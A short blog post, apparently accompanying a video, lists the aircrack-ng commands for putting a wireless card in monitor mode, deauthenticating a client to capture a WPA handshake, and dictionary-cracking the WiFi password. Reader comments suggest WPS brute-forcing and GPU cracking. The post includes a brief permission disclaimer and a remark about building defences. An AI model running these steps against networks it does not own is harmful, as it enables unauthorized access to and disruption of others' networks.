Cracking wifi passwords with Kali Linux

I haven’t really done a technical walkthrough type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making, screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at

The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.

In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.

1. airmon-ng (will list all wireless cards)
2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode mine was mon0)
3. airodump-ng mon0
4. Ctrl+C (once you see the network you want to connect to.
5. Airodump-ng -c [channel] -bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
6. Open a second terminal window
7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
8. You should see the message that you’ve captured the handshake so hit Ctrl+C
9. aircrack-ng -a2 -b [router bssid] -w[path to dictionary] /root/Desktop/*.cap
10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.

Like any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.

Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a wifi password, which is script kiddie territory. The real question goes a lot deeper what can be done with this information? What other information is within the .CAP file? Can this be automated and chained? How can this scenario be run in different ways from an attacker perspective – and also how can you use this knowledge to build better defences?

3 thoughts on “Cracking wifi passwords with Kali Linux

  1. Yes its Infeasible attack, I would rather go for WPS Brute-Force attack, because it has success after few hours. Also there is something being researched called : Offline WPS Bruteforce attack, That would make bruteforce lil faster.


  2. It’s not a new thing for sure – but old is subject to when one was introduced to the material.

    And no, BackTrack 5 was the old version and Kali is the new one… effectively Kali is backtrack 6.


  3. A little old information no? Also isn’t it now called BackTrack 5 and not Kali….that being said, the default WiFi password that comes with many routers, won’t be in a dictionary. Best method (also hardest to accomplish compared to Script Kiddie material), is to use a doctonary attack and a bruteforce is that does not work, as well as use GPUs to process the bruteforcing if required.


Comments are closed.